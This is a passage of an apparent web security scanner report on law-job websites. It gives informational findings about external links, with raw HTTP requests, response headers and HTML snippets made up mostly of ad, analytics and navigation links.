<td width="100" valign="top" class="imgtext"><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/articleimages/bcglogo_sm.jpg" width="84" height="48" border="0" class="articleimg" alt="BCG Attorney Search" title="BCG Attorney Search">
...[SNIP]...
<td height="50" align="center" class="bgwhite"><a href="http://www.google.co.in/ig/directory?hl=en&type=gadgets&url=www.lawcrossing.com/lawcrossing-google.xml" target="_blank"><img src="http://www.lawcrossing.com/images/bt_addtoigoogle.gif" width="203" height="37" alt="Add to iGoogle" title="Add to iGoogle" border="0">
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...
<noscript>
       <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="262" height="210" id="map" align="middle">
           <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<img src="http://www.lawcrossing.com/images/arrowwhite_next.gif" width="4" height="7" border="0" alt="" align="absmiddle">&nbsp;&nbsp;<a href="http://www.lateralattorneyreport.com/" target="_blank">Lateral Attorney Report<br>
...[SNIP]...
<td width="100%"><a href="http://www.facebook.com/pages/LawCrossing/308665573370?ref=search&sid=1742093369.4022958212..1" target="_blank"><img src="http://www.lawcrossing.com/images/facebook.jpg" width="95" height="21" border="0" alt="Facebook" title="Facebook" align="absmiddle"></a>&nbsp;<a href="http://twitter.com/Law_Crossing" target="_blank"><img src="http://www.lawcrossing.com/images/twitter.jpg" width="163" height="21" border="0" alt="Twitter" title="Twitter" align="absmiddle">
...[SNIP]...
<td width="100%"><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/banner/bcg_265x90.jpg" width="265" height="90" border="0" alt="BCG Attorney Search" title="BCG Attorney Search">
...[SNIP]...
<td colspan="2" align="center"><a href="http://www.hound.com/" target="_blank"><img src="http://images.hound.com/logo_right.jpg" alt="" width="94" height="100" border="0"></a>
...[SNIP]...
<td>
<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FLawCrossing%2F308665573370&amp;width=265&amp;colorscheme=light&amp;connections=100&amp;stream=true&amp;header=true&amp;height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:265px; height:587px;" allowTransparency="true"></iframe>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ac78da0c&amp;cb=652599' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=320&amp;n=ac78da0c&amp;' border='0' alt='' /></a>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ada8b533&amp;cb=512549' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=289&amp;n=ada8b533&amp;' border='0' alt='' /></a>
...[SNIP]...
<td><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<td width="100%" align="center" bgcolor="#f7f7f7"><img src="http://www.jdjournal.com/images/jdjlogo.jpg" width="190" height="54" border="0" alt="JDJournal"></td>
...[SNIP]...
<br><a href="http://www.bcgsearch.com/" target="_blank"><img src="http://www.lawcrossing.com/images/bcglogo.jpg" width="66" height="32" border="0" alt="BCG Attorney Search">
...[SNIP]...
<div align="right"><a href="http://www.bcgsearch.com/searchresults.php?key=OP3V61427" target="_blank"><strong>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<noscript><a href='http://srvr12.pdcsrvr.com/media/www/empsc/ck.php?n=ab00dbd7&amp;cb=554147' target='_blank'><img src='http://srvr12.pdcsrvr.com/media/www/empsc/avw.php?zoneid=204&amp;source=_blank&amp;n=ab00dbd7' border='0' alt='' /></a>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.attorneyresume.com/" target="_blank">Resume Writing Service</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.resumeboomer.com/" target="_blank">Post Resume</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.legalrecruitersubmitter.com/" target="_blank">Send Resume</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.legalauthority.com/" target="_blank">Resume Distribution</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.aharrisonbarnes.com/" target="_blank">Career Advice</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">Job Search Tips</a>
...[SNIP]...
<br>
<a href="http://employers.employmentcrossing.com/?compid=2">Employers / Recruiters - Post Jobs</a>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.jdjournal.com/" target="_blank">Law Firm News</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.bcgsearch.com" target="_blank">Legal Recruiter</a>
...[SNIP]...
<td height="80" align="center"><a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.lawcrossing.com/images/logo_es.jpg" width="163" height="50" border="0" alt="Employment Research Institute" title="Employment Research Institute">
...[SNIP]...
</script>
   
           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script><noscript><a href="http://www.statcounter.com/" target="_blank"><img src="http://c16.statcounter.com/counter.php?sc_project=1646201&amp;java=0&amp;security=b657086a&amp;invisible=1" alt="web statistics" border="0"></a>
...[SNIP]...

14.14. http://www.lawfirmstaff.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawfirmstaff.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=LFS-NeedaContact125x125\ HTTP/1.1
Host: www.lawfirmstaff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3ondnk2d7pvm3vd81q243396b6; path=/; domain=www.lawfirmstaff.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27468

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Law Firm Placement, Legal Staff, Law Firm Jobs, Legal Placement - Law Firm S
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Law Firm Staff Jobs RSS Feed" href="http://www.lawfirmstaff.com/lfsrssjobs.php" target="_blank" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<br>
<a href="http://twitter.com/aharrisonbarnes" target="_blank"><img src="http://www.lawfirmstaff.com/images/twitter_followme.jpg" border="0" alt="Follow Me on Twitter">
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/' rel='bookmark' title='Permanent Link: Do Not Stop Seeing Opportunity: Step Outside Your Mind&#8217;s Comfort Zone and Begin to Dream'>Do Not Stop Seeing Opportunity: Step Outside Your Mind&#8217;s Comfort Zone and Begin to Dream</a>
...[SNIP]...
<li><a href='http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/' rel='bookmark' title='Permanent Link: Push Yourself Outside Your Comfort Zone'>Push Yourself Outside Your Comfort Zone</a>
...[SNIP]...
<br><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<div>
       <a href="http://www.aharrisonbarnes.com/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0" >
<a href="http://www.lawcrossing.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.bcgsearch.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.attorneyresume.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<br>
<a href="https://www.lawschoolloans.com/lslprivateloan_application.php" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.legalauthority.com" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
       <a href="http://www.jdjournal.com/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.resumeboomer.com/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<img src="http://www.lawfirmstaff.com/images/blanker.gif" alt="" width="10" height="1" border="0">
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank"><font color="#9e2f40">
...[SNIP]...
<center><a href="http://www.employmentresearchinstitute.com" target="_blank"><img src="http://www.lawfirmstaff.com/images/logo_es.gif" alt="Employment Research Institute" border="0">
...[SNIP]...
</strong>
       <a href="http://www.100kcrossing.com" target="_blank">&nbsp;100KCrossing</a>| <a href="http://www.AccountingCrossing.com" target="_blank">&nbsp;AccountingCrossing</a>| <a href="http://www.accountmanagementcrossing.com" target="_blank">&nbsp;AccountManagementCrossing</a>| <a href="http://www.ActuarialCrossing.com" target="_blank">&nbsp;ActuarialCrossing</a>| <a href="http://www.AdminCrossing.com" target="_blank">&nbsp;AdminCrossing</a>| <a href="http://www.advertisingcrossing.com" target="_blank">&nbsp;AdvertisingCrossing</a>| <a href="http://www.AerospaceCrossing.com" target="_blank">&nbsp;AerospaceCrossing</a>| <a href="http://www.AgriculturalCrossing.com" target="_blank">&nbsp;AgriculturalCrossing</a>| <a href="http://www.ArchitectureCrossing.com" target="_blank">&nbsp;ArchitectureCrossing</a>| <a href="http://www.attorneyresume.com" target="_blank">&nbsp;Attorney Resume</a>| <a href="http://www.AuditorCrossing.com" target="_blank">&nbsp;AuditorCrossing</a>| <a href="http://www.AutomotiveCrossing.com" target="_blank">&nbsp;AutomotiveCrossing</a>| <a href="http://www.AviationCrossing.com" target="_blank">&nbsp;AviationCrossing</a>| <a href="http://www.bcgsearch.com" target="_blank">&nbsp;BCG Attorney Search</a>| <a href="http://www.BilingualCrossing.com" target="_blank">&nbsp;BilingualCrossing</a>| <a href="http://www.BioTechCrossing.com" target="_blank">&nbsp;BiotechCrossing</a>| <a href="http://www.BlueCollarCrossing.com" target="_blank">&nbsp;BlueCollarCrossing</a>| <a href="http://www.businessanalystcrossing.com" target="_blank">&nbsp;BusinessAnalystCrossing</a>| <a href="http://www.BusinessDevelopmentCrossing.com" target="_blank">&nbsp;BusinessDevelopmentCrossing</a>| <a href="http://www.CallCenterCrossing.com" target="_blank">&nbsp;CallCenterCrossing</a>| <a href="http://www.ChefCrossing.com" target="_blank">&nbsp;ChefCrossing</a>| <a href="http://www.CivilEngineeringCrossing.com" target="_blank">&nbsp;CivilEngineeringCrossing</a>| <a 
href="http://www.CLevelCrossing.com" target="_blank">&nbsp;CLevelCrossing</a>| <a href="http://www.ClinicalResearchCrossing.com" target="_blank">&nbsp;ClinicalResearchCrossing</a>| <a href="http://www.ComplianceCrossing.com" target="_blank">&nbsp;ComplianceCrossing</a>| <a href="http://www.ComputerAidedDesignCrossing.com" target="_blank">&nbsp;ComputerAidedDesignCrossing</a>| <a href="http://www.ConstructionCrossing.com" target="_blank">&nbsp;ConstructionCrossing</a>| <a href="http://www.ConsultingCrossing.com" target="_blank">&nbsp;ConsultingCrossing</a>| <a href="http://www.ContractManagementCrossing.com" target="_blank">&nbsp;ContractManagementCrossing</a>| <a href="http://www.CounselingCrossing.com" target="_blank">&nbsp;CounselingCrossing</a>| <a href="http://www.CPlusPlusCrossing.com" target="_blank">&nbsp;CPlusPlusCrossing</a>| <a href="http://www.CustomerServiceCrossing.com" target="_blank">&nbsp;CustomerServiceCrossing</a>| <a href="http://www.DBACrossing.com" target="_blank">&nbsp;DBACrossing</a>| <a href="http://www.DentalCrossing.com" target="_blank">&nbsp;DentalCrossing</a>| <a href="http://www.DesigningCrossing.com" target="_blank">&nbsp;DesigningCrossing</a>| <a href="http://www.DiversityCrossing.com" target="_blank">&nbsp;DiversityCrossing</a>| <a href="http://www.DotNetCrossing.com" target="_blank">&nbsp;DotNetCrossing</a>| <a href="http://www.ECommerceCrossing.com" target="_blank">&nbsp;ECommerceCrossing</a>| <a href="http://www.edfed.com" target="_blank">&nbsp;EdFed</a>| <a href="http://www.EditingCrossing.com" target="_blank">&nbsp;EditingCrossing</a>| <a href="http://www.EducationCrossing.com" target="_blank">&nbsp;EducationCrossing</a>| <a href="http://www.EmploymentAuthority.com" target="_blank">&nbsp;EmploymentAuthority</a>| <a href="http://www.employmentcrossing.com" target="_blank">&nbsp;EmploymentCrossing</a>| <a href="http://www.EnergyCrossing.com" target="_blank">&nbsp;EnergyCrossing</a>| <a href="http://www.EngineeringCrossing.com" 
target="_blank">&nbsp;EngineeringCrossing</a>| <a href="http://www.EntryLevelCrossing.com" target="_blank">&nbsp;EntryLevelCrossing</a>| <a href="http://www.EnvironmentalCrossing.com" target="_blank">&nbsp;EnvironmentalCrossing</a>| <a href="http://www.EnvironmentalSafetyHealthCrossing.com" target="_blank">&nbsp;EnvironmentalSafetyHealthCrossing</a>| <a href="http://www.erpcrossing.com" target="_blank">&nbsp;SAPCrossing</a>| <a href="http://www.ExecCrossing.com" target="_blank">&nbsp;ExecCrossing</a>| <a href="http://www.FacilitiesCrossing.com" target="_blank">&nbsp;FacilitiesCrossing</a>| <a href="http://www.FinancialServicesCrossing.com" target="_blank">&nbsp;FinancialServicesCrossing</a>| <a href="http://www.FoodServicesCrossing.com" target="_blank">&nbsp;FoodServicesCrossing</a>| <a href="http://www.FundraisingCrossing.com" target="_blank">&nbsp;FundraisingCrossing</a>| <a href="http://www.GISCrossing.com" target="_blank">&nbsp;GISCrossing</a>| <a href="http://www.GovernmentCrossing.com" target="_blank">&nbsp;GovernmentCrossing</a>| <a href="http://www.graduateschoolloans.com" target="_blank">&nbsp;Graduate School Loans</a>| <a href="http://www.HealthcareCrossing.com" target="_blank">&nbsp;HealthcareCrossing</a>| <a href="http://www.HelpDeskCrossing.com" target="_blank">&nbsp;HelpDeskCrossing</a>| <a href="http://www.HospitalityCrossing.com" target="_blank">&nbsp;HospitalityCrossing</a>| <a href="http://www.hound.com" target="_blank">&nbsp;Hound</a>| <a href="http://www.hrcrossing.com" target="_blank">&nbsp;HRCrossing</a>| <a href="http://www.HVACCrossing.com" target="_blank">&nbsp;HVACCrossing</a>| <a href="http://www.InformationTechnologyCrossing.com" target="_blank">&nbsp;InformationTechnologyCrossing</a>| <a href="http://www.insurcrossing.com" target="_blank">&nbsp;InsurCrossing</a>| <a href="http://www.IntellectualPropertyCrossing.com" target="_blank">&nbsp;IntellectualPropertyCrossing</a>| <a href="http://www.InternshipCrossing.com" 
target="_blank">&nbsp;InternshipCrossing</a>| <a href="http://www.J2EECrossing.com" target="_blank">&nbsp;J2EECrossing</a>| <a href="http://www.jd2b.com" target="_blank">&nbsp;JD2B</a>| <a href="http://www.jdjournal.com" target="_blank">&nbsp;JDJournal</a>| <a href="http://www.JournalismCrossing.com" target="_blank">&nbsp;JournalismCrossing</a>| <a href="http://www.judged.com" target="_blank">&nbsp;Judged</a>| <a href="http://www.lawcrossing.com" target="_blank">&nbsp;LawCrossing</a>| <a href="http://www.lawschoolloanreport.org" target="_blank">&nbsp;Law School Loan Report</a>| <a href="http://www.lawschoolloans.com" target="_blank">&nbsp;Law School Loans</a>| <a href="http://www.legalauthority.com" target="_blank">&nbsp;Legal Authority</a>| <a href="http://www.LegalAuthorityFinancial.com" target="_blank">&nbsp;Legal Authority Financial</a>| <a href="http://www.LogisticsCrossing.com" target="_blank">&nbsp;LogisticsCrossing</a>| <a href="http://www.ManagerCrossing.com" target="_blank">&nbsp;ManagerCrossing</a>| <a href="http://www.ManufacturingCrossing.com" target="_blank">&nbsp;ManufacturingCrossing</a>| <a href="http://www.marketingcrossing.com" target="_blank">&nbsp;MarketingCrossing</a>| <a href="http://www.MediaJobCrossing.com" target="_blank">&nbsp;MediaJobCrossing</a>| <a href="http://www.medicalschoolloans.com" target="_blank">&nbsp;Medical School Loans</a>| <a href="http://www.MilitaryCrossing.com" target="_blank">&nbsp;MilitaryCrossing</a>| <a href="http://www.NursingCrossing.com" target="_blank">&nbsp;NursingCrossing</a>| <a href="http://www.OccupationalTherapyCrossing.com" target="_blank">&nbsp;OccupationalTherapyCrossing</a>| <a href="http://www.operationscrossing.com" target="_blank">&nbsp;OperationsCrossing</a>| <a href="http://www.PartTimeCrossing.com" target="_blank">&nbsp;PartTimeCrossing</a>| <a href="http://www.PharmaceuticalCrossing.com" target="_blank">&nbsp;PharmaceuticalCrossing</a>| <a href="http://www.PhysicalSecurityCrossing.com" 
target="_blank">&nbsp;PhysicalSecurityCrossing</a>| <a href="http://www.PhysicalTherapyCrossing.com" target="_blank">&nbsp;PhysicalTherapyCrossing</a>| <a href="http://www.PlanningCrossing.com" target="_blank">&nbsp;PlanningCrossing</a>| <a href="http://www.PostDoctoralFellowCrossing.com" target="_blank">&nbsp;PostdoctoralFellowCrossing</a>| <a href="http://www.prcrossing.com" target="_blank">&nbsp;PRCrossing</a>| <a href="http://www.preferredresumes.com" target="_blank">&nbsp;Preferred Resumes</a>| <a href="http://www.ProcurementCrossing.com" target="_blank">&nbsp;ProcurementCrossing</a>| <a href="http://www.ProductManagerCrossing.com" target="_blank">&nbsp;ProductManagerCrossing</a>| <a href="http://www.projectmanagementcrossing.com" target="_blank">&nbsp;ProjectManagementCrossing</a>| <a href="http://www.PublicInterestCrossing.com" target="_blank">&nbsp;PublicInterestCrossing</a>| <a href="http://www.PublishingCrossing.com" target="_blank">&nbsp;PublishingCrossing</a>| <a href="http://www.PurchasingCrossing.com" target="_blank">&nbsp;PurchasingCrossing</a>| <a href="http://www.qaqccrossing.com" target="_blank">&nbsp;QAQCCrossing</a>| <a href="http://www.RadioCrossing.com" target="_blank">&nbsp;RadioCrossing</a>| <a href="http://www.realestateandlandcrossing.com" target="_blank">&nbsp;RealEstateAndLandCrossing</a>| <a href="http://www.RecruitingCrossing.com" target="_blank">&nbsp;RecruitingCrossing</a>| <a href="http://www.ResearchingCrossing.com" target="_blank">&nbsp;ResearchingCrossing</a>| <a href="http://www.RetailCrossing.com" target="_blank">&nbsp;RetailCrossing</a>| <a href="http://www.sciencescrossing.com" target="_blank">&nbsp;SciencesCrossing</a>| <a href="http://www.ScientistCrossing.com" target="_blank">&nbsp;ScientistCrossing</a>| <a href="http://www.sellingcrossing.com" target="_blank">&nbsp;SellingCrossing</a>| <a href="http://www.SQLCrossing.com" target="_blank">&nbsp;SQLCrossing</a>| <a href="http://www.TeenagerCrossing.com" 
target="_blank">&nbsp;TeenagerCrossing</a>| <a href="http://www.TelecomCrossing.com" target="_blank">&nbsp;TelecomCrossing</a>| <a href="http://www.TradingCrossing.com" target="_blank">&nbsp;TradingCrossing</a>| <a href="http://www.TrainingCrossing.com" target="_blank">&nbsp;TrainingCrossing</a>| <a href="http://www.TransportationCrossing.com" target="_blank">&nbsp;TransportationCrossing</a>| <a href="http://www.TravelingCrossing.com" target="_blank">&nbsp;TravelingCrossing</a>| <a href="http://www.TruckingCrossing.com" target="_blank">&nbsp;TruckingCrossing</a>| <a href="http://www.TVCrossing.com" target="_blank">&nbsp;TVCrossing</a>| <a href="http://www.UnderWritingCrossing.com" target="_blank">&nbsp;UnderwritingCrossing</a>| <a href="http://www.VeterinaryCrossing.com" target="_blank">&nbsp;VeterinaryCrossing</a>| <a href="http://www.VolunteerCrossing.com" target="_blank">&nbsp;VolunteerCrossing</a>| <a href="http://www.WorkAtHomeCrossing.com" target="_blank">&nbsp;WorkAtHomeCrossing</a>| <a href="http://www.WritingCrossing.com" target="_blank">&nbsp;WritingCrossing</a>
...[SNIP]...

14.15. http://www.legalauthority.com/signup.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=992k9ej417pj5iq8b87icbaho3; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=992k9ej417pj5iq8b87icbaho3; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 54292

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1"></script>
...[SNIP]...
<td valign="top"><a href="http://www.attorneyresume.com/" target="_blank"><img src="http://www.legalauthority.com/images/img-resume.jpg" alt="" width="89" height="110" border="0">
...[SNIP]...
<br><a href="http://www.attorneyresume.com/" target="_blank"><img src="http://www.legalauthority.com/images/ar-logo.jpg" alt="" width="187" height="28" border="0">
...[SNIP]...
<td valign="top"><a href="http://www.employmentscape.com/downloadaudio.php?aid=ec8956637a99787bd197eacd77acce5e" target="_blank"><img src="http://www.legalauthority.com/images/img-mp3.jpg" alt="" width="89" height="76" border="0">
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       <a href="http://www.aharrisonbarnes.com/" target="_blank">FOUNDER HARRISON BARNES' BLOG</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       <a href="http://www.bcgsearch.com" target="_blank">LEGAL RECRUITER</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.attorneyresume.com" target="_blank">RESUME SERVICE</a>
...[SNIP]...
<br>
       <a href="http://www.jdjournal.com/" target="_blank">LAW FIRM NEWS</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.lawcrossing.com/" target="_blank">LEGAL JOBS</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.resumeboomer.com/" target="_blank">POST RESUME</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a href="http://www.aharrisonbarnes.com/hb-course/" target="_blank">JOB SEARCH COURSE</a>
...[SNIP]...
<br style="line-height:7px;">
<a href="http://www.employmentresearchinstitute.com/" target="_blank"><img src="http://www.legalauthority.com/images/logo_es.jpg" width="163" height="49" border="0" alt="Employment Research Institute">
...[SNIP]...
<br>
<a href="http://www.100kcrossing.com" target="_blank">&nbsp;100KCrossing</a>| <a href="http://www.AccountingCrossing.com" target="_blank">&nbsp;AccountingCrossing</a>| <a href="http://www.accountmanagementcrossing.com" target="_blank">&nbsp;AccountManagementCrossing</a>| <a href="http://www.ActuarialCrossing.com" target="_blank">&nbsp;ActuarialCrossing</a>| <a href="http://www.AdminCrossing.com" target="_blank">&nbsp;AdminCrossing</a>| <a href="http://www.advertisingcrossing.com" target="_blank">&nbsp;AdvertisingCrossing</a>| <a href="http://www.AerospaceCrossing.com" target="_blank">&nbsp;AerospaceCrossing</a>| <a href="http://www.AgriculturalCrossing.com" target="_blank">&nbsp;AgriculturalCrossing</a>| <a href="http://www.ArchitectureCrossing.com" target="_blank">&nbsp;ArchitectureCrossing</a>| <a href="http://www.attorneyresume.com" target="_blank">&nbsp;Attorney Resume</a>| <a href="http://www.AuditorCrossing.com" target="_blank">&nbsp;AuditorCrossing</a>| <a href="http://www.AutomotiveCrossing.com" target="_blank">&nbsp;AutomotiveCrossing</a>| <a href="http://www.AviationCrossing.com" target="_blank">&nbsp;AviationCrossing</a>| <a href="http://www.bcgsearch.com" target="_blank">&nbsp;BCG Attorney Search</a>| <a href="http://www.BilingualCrossing.com" target="_blank">&nbsp;BilingualCrossing</a>| <a href="http://www.BioTechCrossing.com" target="_blank">&nbsp;BiotechCrossing</a>| <a href="http://www.BlueCollarCrossing.com" target="_blank">&nbsp;BlueCollarCrossing</a>| <a href="http://www.businessanalystcrossing.com" target="_blank">&nbsp;BusinessAnalystCrossing</a>| <a href="http://www.BusinessDevelopmentCrossing.com" target="_blank">&nbsp;BusinessDevelopmentCrossing</a>| <a href="http://www.CallCenterCrossing.com" target="_blank">&nbsp;CallCenterCrossing</a>| <a href="http://www.ChefCrossing.com" target="_blank">&nbsp;ChefCrossing</a>| <a href="http://www.CivilEngineeringCrossing.com" target="_blank">&nbsp;CivilEngineeringCrossing</a>| <a 
href="http://www.CLevelCrossing.com" target="_blank">&nbsp;CLevelCrossing</a>| <a href="http://www.ClinicalResearchCrossing.com" target="_blank">&nbsp;ClinicalResearchCrossing</a>| <a href="http://www.ComplianceCrossing.com" target="_blank">&nbsp;ComplianceCrossing</a>| <a href="http://www.ComputerAidedDesignCrossing.com" target="_blank">&nbsp;ComputerAidedDesignCrossing</a>| <a href="http://www.ConstructionCrossing.com" target="_blank">&nbsp;ConstructionCrossing</a>| <a href="http://www.ConsultingCrossing.com" target="_blank">&nbsp;ConsultingCrossing</a>| <a href="http://www.ContractManagementCrossing.com" target="_blank">&nbsp;ContractManagementCrossing</a>| <a href="http://www.CounselingCrossing.com" target="_blank">&nbsp;CounselingCrossing</a>| <a href="http://www.CPlusPlusCrossing.com" target="_blank">&nbsp;CPlusPlusCrossing</a>| <a href="http://www.CustomerServiceCrossing.com" target="_blank">&nbsp;CustomerServiceCrossing</a>| <a href="http://www.DBACrossing.com" target="_blank">&nbsp;DBACrossing</a>| <a href="http://www.DentalCrossing.com" target="_blank">&nbsp;DentalCrossing</a>| <a href="http://www.DesigningCrossing.com" target="_blank">&nbsp;DesigningCrossing</a>| <a href="http://www.DiversityCrossing.com" target="_blank">&nbsp;DiversityCrossing</a>| <a href="http://www.DotNetCrossing.com" target="_blank">&nbsp;DotNetCrossing</a>| <a href="http://www.ECommerceCrossing.com" target="_blank">&nbsp;ECommerceCrossing</a>| <a href="http://www.edfed.com" target="_blank">&nbsp;EdFed</a>| <a href="http://www.EditingCrossing.com" target="_blank">&nbsp;EditingCrossing</a>| <a href="http://www.EducationCrossing.com" target="_blank">&nbsp;EducationCrossing</a>| <a href="http://www.EmploymentAuthority.com" target="_blank">&nbsp;EmploymentAuthority</a>| <a href="http://www.employmentcrossing.com" target="_blank">&nbsp;EmploymentCrossing</a>| <a href="http://www.EnergyCrossing.com" target="_blank">&nbsp;EnergyCrossing</a>| <a href="http://www.EngineeringCrossing.com" 
target="_blank">&nbsp;EngineeringCrossing</a>| <a href="http://www.EntryLevelCrossing.com" target="_blank">&nbsp;EntryLevelCrossing</a>| <a href="http://www.EnvironmentalCrossing.com" target="_blank">&nbsp;EnvironmentalCrossing</a>| <a href="http://www.EnvironmentalSafetyHealthCrossing.com" target="_blank">&nbsp;EnvironmentalSafetyHealthCrossing</a>| <a href="http://www.erpcrossing.com" target="_blank">&nbsp;SAPCrossing</a>| <a href="http://www.ExecCrossing.com" target="_blank">&nbsp;ExecCrossing</a>| <a href="http://www.FacilitiesCrossing.com" target="_blank">&nbsp;FacilitiesCrossing</a>| <a href="http://www.FinancialServicesCrossing.com" target="_blank">&nbsp;FinancialServicesCrossing</a>| <a href="http://www.FoodServicesCrossing.com" target="_blank">&nbsp;FoodServicesCrossing</a>| <a href="http://www.FundraisingCrossing.com" target="_blank">&nbsp;FundraisingCrossing</a>| <a href="http://www.GISCrossing.com" target="_blank">&nbsp;GISCrossing</a>| <a href="http://www.GovernmentCrossing.com" target="_blank">&nbsp;GovernmentCrossing</a>| <a href="http://www.graduateschoolloans.com" target="_blank">&nbsp;Graduate School Loans</a>| <a href="http://www.HealthcareCrossing.com" target="_blank">&nbsp;HealthcareCrossing</a>| <a href="http://www.HelpDeskCrossing.com" target="_blank">&nbsp;HelpDeskCrossing</a>| <a href="http://www.HospitalityCrossing.com" target="_blank">&nbsp;HospitalityCrossing</a>| <a href="http://www.hound.com" target="_blank">&nbsp;Hound</a>| <a href="http://www.hrcrossing.com" target="_blank">&nbsp;HRCrossing</a>| <a href="http://www.HVACCrossing.com" target="_blank">&nbsp;HVACCrossing</a>| <a href="http://www.InformationTechnologyCrossing.com" target="_blank">&nbsp;InformationTechnologyCrossing</a>| <a href="http://www.insurcrossing.com" target="_blank">&nbsp;InsurCrossing</a>| <a href="http://www.IntellectualPropertyCrossing.com" 